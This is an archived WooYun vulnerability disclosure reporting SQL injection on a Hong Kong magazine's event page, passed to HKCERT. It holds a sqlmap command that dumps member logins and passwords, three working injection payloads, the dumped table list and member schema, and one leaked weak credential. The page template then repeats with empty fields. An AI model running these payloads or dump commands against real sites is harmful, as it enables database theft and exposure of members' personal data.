U Magazine某處存在SQL插入攻擊（107個表/管理員弱密碼泄露）（香港地區）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0151441

漏洞标题：U Magazine某處存在SQL插入攻擊（107個表/管理員弱密碼泄露）（香港地區）

漏洞作者：路人甲

提交时间：2015-11-04 18:17

修复时间：2015-12-22 13:10

公开时间：2015-12-22 13:10

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-11-04：细节已通知厂商并且等待厂商处理中
2015-11-07：厂商已经确认，细节仅向厂商公开
2015-11-17：细节向核心白帽子及相关领域专家公开
2015-11-27：细节向普通白帽子公开
2015-12-07：细节向实习白帽子公开
2015-12-22：细节向公众公开

简要描述：

U Magazine 創刊 4 年多，口碑載道，繼 2007 獲頒 APMA 亞洲最佳新雜誌獎 (左)後，更於2008 年 4 月榮獲第 7 屆亞洲媒體獎 (右) ( 7th Asia Media Awards 2008 ) 2 項金獎殊榮，包括最佳封面設計獎金獎 (雜誌組) 及最佳專題報導獎金獎 (雜誌組) ，今次是 U Magazine 首次參加這個比賽，最終憑藉第 100 期的 "100% Tokyo" 的獨特設，撃敗來自新加坡的 I Weekly (銀獎) 及 TIME (銅獎)。另憑探討公共空間的公共建築大變身及六個起樓的青年的 "香港建築系列"奪最佳專題報導獎金獎。是唯一一本能連奪 2 項金獎的入圍香港雜誌。2009 年 U Magazine 再接再厲，再次榮獲另一亞洲性的重要獎項，Asia Travel & Tourism Creative Awards "最佳旅遊攝影獎" -風景組銅獎，是次得獎對 U Magazine 來說別見意義。

详细说明：

地址：http://**.**.**.**/event_result.php?event_pkey=142

python sqlmap.py -u "http://**.**.**.**/event_result.php?event_pkey=142" -p event_pkey --technique=BEU --random-agent --batch -D umagazine_v3 -T tbl_member -C login,password,name,mobile_tel,email --dump

漏洞证明：

---
Parameter: event_pkey (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: event_pkey=142' AND 8553=8553 AND 'qUpz'='qUpz
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: event_pkey=142' AND (SELECT 1368 FROM(SELECT COUNT(*),CONCAT(0x716b707a71,(SELECT (ELT(1368=1368,1))),0x717a6b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'pbZT'='pbZT
    Type: UNION query
    Title: MySQL UNION query (NULL) - 23 columns
    Payload: event_pkey=-1551' UNION ALL SELECT NULL,NULL,CONCAT(0x716b707a71,0x46714e774e63745a547852424e4757734563626a7959536c4e4b5a555469656154755a4279765143,0x717a6b7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0
available databases [3]:
[*] information_schema
[*] test
[*] umagazine_v3
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: event_pkey (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: event_pkey=142' AND 8553=8553 AND 'qUpz'='qUpz
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: event_pkey=142' AND (SELECT 1368 FROM(SELECT COUNT(*),CONCAT(0x716b707a71,(SELECT (ELT(1368=1368,1))),0x717a6b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'pbZT'='pbZT
    Type: UNION query
    Title: MySQL UNION query (NULL) - 23 columns
    Payload: event_pkey=-1551' UNION ALL SELECT NULL,NULL,CONCAT(0x716b707a71,0x46714e774e63745a547852424e4757734563626a7959536c4e4b5a555469656154755a4279765143,0x717a6b7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0
Database: umagazine_v3
[107 tables]
+-----------------------------------+
| tbl_ad                            |
| tbl_admin                         |
| tbl_badwords                      |
| tbl_badwords_bak                  |
| tbl_banner1                       |
| tbl_banner1_item                  |
| tbl_banner2                       |
| tbl_banner2_item                  |
| tbl_banner3                       |
| tbl_banner3_item                  |
| tbl_banner4                       |
| tbl_banner4_item                  |
| tbl_banner5                       |
| tbl_banner5_item                  |
| tbl_cms_doc                       |
| tbl_cms_photo                     |
| tbl_contact                       |
| tbl_content                       |
| tbl_contents_book                 |
| tbl_contents_book_bak2            |
| tbl_contents_book_bak3            |
| tbl_contents_book_desc_photo      |
| tbl_contents_book_desc_photo_bak  |
| tbl_contents_book_desc_photo_bak2 |
| tbl_contents_book_desc_photo_bak3 |
| tbl_contents_book_pages           |
| tbl_contents_book_pages_bak       |
| tbl_contents_book_pages_bak2      |
| tbl_contents_book_pages_bak3      |
| tbl_contents_section              |
| tbl_doclist                       |
| tbl_doclist_item                  |
| tbl_event                         |
| tbl_event_option                  |
| tbl_event_question                |
| tbl_event_result                  |
| tbl_eventalbum                    |
| tbl_eventcontent                  |
| tbl_eventphoto                    |
| tbl_experts                       |
| tbl_forum                         |
| tbl_forum_badword                 |
| tbl_forum_group                   |
| tbl_forum_reply                   |
| tbl_forum_setting                 |
| tbl_forum_topic                   |
| tbl_forum_user_upload_photo       |
| tbl_game                          |
| tbl_gameresult                    |
| tbl_gift                          |
| tbl_gift_option                   |
| tbl_gift_result                   |
| tbl_gift_winner                   |
| tbl_home                          |
| tbl_left_menu                     |
| tbl_link                          |
| tbl_member                        |
| tbl_member_20071026               |
| tbl_member_20080709               |
| tbl_member_bak                    |
| tbl_member_bookmark               |
| tbl_member_forum                  |
| tbl_member_forum_20080709         |
| tbl_member_old                    |
| tbl_page                          |
| tbl_page_content                  |
| tbl_photo                         |
| tbl_photo_album_photo             |
| tbl_photo_album_photo_cat         |
| tbl_photo_poll                    |
| tbl_photo_poll_old                |
| tbl_photo_poll_photo              |
| tbl_photo_poll_photo_old          |
| tbl_photo_rte                     |
| tbl_photo_sharing                 |
| tbl_photo_sharing_country         |
| tbl_photo_sharing_country_group   |
| tbl_photo_sharing_index           |
| tbl_photo_sharing_setup           |
| tbl_poll                          |
| tbl_pollingcontent                |
| tbl_qna                           |
| tbl_story                         |
| tbl_story_country                 |
| tbl_story_country_group           |
| tbl_story_setup                   |
| tbl_test                          |
| tbl_tips                          |
| tbl_tipscontent                   |
| tbl_uclub_promote                 |
| tbl_video                         |
| tbl_video_album_video             |
| tbl_video_album_video_cat         |
| tbl_video_country                 |
| tbl_video_country_group           |
| tbl_video_item                    |
| tbl_vote                          |
| tbl_vote_ite                      |
| tbl_vote_main                     |
| tbl_vote_option                   |
| tbl_vote_photo                    |
| tbl_vote_photo_old                |
| tbl_vote_topic                    |
| tbl_wallpaper                     |
| tbl_wallpaper_country             |
| tbl_wallpaper_country_group       |
| tbl_wallpaper_setup               |
+-----------------------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: event_pkey (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: event_pkey=142' AND 8553=8553 AND 'qUpz'='qUpz
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: event_pkey=142' AND (SELECT 1368 FROM(SELECT COUNT(*),CONCAT(0x716b707a71,(SELECT (ELT(1368=1368,1))),0x717a6b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'pbZT'='pbZT
    Type: UNION query
    Title: MySQL UNION query (NULL) - 23 columns
    Payload: event_pkey=-1551' UNION ALL SELECT NULL,NULL,CONCAT(0x716b707a71,0x46714e774e63745a547852424e4757734563626a7959536c4e4b5a555469656154755a4279765143,0x717a6b7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0
Database: umagazine_v3
Table: tbl_member
[56 columns]
+-----------------+--------------+
| Column          | Type         |
+-----------------+--------------+
| version         | int(11)      |
| active          | tinyint(1)   |
| addr_area       | varchar(50)  |
| addr_block      | varchar(50)  |
| addr_building   | varchar(100) |
| addr_district   | varchar(100) |
| addr_estate     | varchar(100) |
| addr_floor      | varchar(50)  |
| addr_room       | varchar(50)  |
| addr_street     | varchar(100) |
| age             | varchar(50)  |
| chi_name        | varchar(50)  |
| dob             | datetime     |
| dob_d           | int(11)      |
| dob_m           | int(11)      |
| education       | varchar(50)  |
| email           | varchar(50)  |
| expense1        | varchar(50)  |
| expense2        | varchar(50)  |
| expense3        | varchar(50)  |
| expense4        | varchar(50)  |
| first_name      | varchar(50)  |
| hkid            | varchar(50)  |
| home_tel        | varchar(50)  |
| income_family   | varchar(50)  |
| income_personal | varchar(50)  |
| internal_remark | text         |
| is_email_list   | tinyint(1)   |
| is_email_list02 | tinyint(1)   |
| is_wc           | tinyint(1)   |
| last_name       | varchar(100) |
| login           | varchar(50)  |
| mobile_tel      | varchar(50)  |
| name            | varchar(50)  |
| occupation      | varchar(50)  |
| password        | varchar(50)  |
| pkey            | int(11)      |
| q1              | text         |
| q2              | text         |
| q3              | text         |
| q4              | text         |
| q5a             | text         |
| q5b             | text         |
| q5c             | text         |
| q5d             | text         |
| q5e             | text         |
| q5f             | text         |
| q5g             | text         |
| q5h             | text         |
| q6              | text         |
| q7              | text         |
| reg_date        | datetime     |
| sex             | varchar(200) |
| tel             | varchar(50)  |
| title           | varchar(10)  |
| total_login     | int(11)      |
+-----------------+--------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: event_pkey (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: event_pkey=142' AND 8553=8553 AND 'qUpz'='qUpz
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: event_pkey=142' AND (SELECT 1368 FROM(SELECT COUNT(*),CONCAT(0x716b707a71,(SELECT (ELT(1368=1368,1))),0x717a6b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'pbZT'='pbZT
    Type: UNION query
    Title: MySQL UNION query (NULL) - 23 columns
    Payload: event_pkey=-1551' UNION ALL SELECT NULL,NULL,CONCAT(0x716b707a71,0x46714e774e63745a547852424e4757734563626a7959536c4e4b5a555469656154755a4279765143,0x717a6b7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0
Database: umagazine_v3
Table: tbl_member
[1 entry]
+---------+----------+---------+------------+---------+
| login   | password | name    | mobile_tel | email   |
+---------+----------+---------+------------+---------+
| richard | 1234     | <blank> | <blank>    | <blank> |
+---------+----------+---------+------------+---------+

修复方案：

上WAF

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：14

确认时间：2015-11-07 13:09

厂商回复：

已將事件通知有關機構

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0151441

漏洞标题：U Magazine某處存在SQL插入攻擊（107個表/管理員弱密碼泄露）（香港地區）

相关厂商：U周刊

漏洞作者：路人甲

提交时间：2015-11-04 18:17

修复时间：2015-12-22 13:10

公开时间：2015-12-22 13:10

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0151441

漏洞标题：U Magazine某處存在SQL插入攻擊（107個表/管理員弱密碼泄露）（香港地區）

相关厂商：U周刊

漏洞作者： 路人甲

提交时间：2015-11-04 18:17

修复时间：2015-12-22 13:10

公开时间：2015-12-22 13:10

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0151441"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云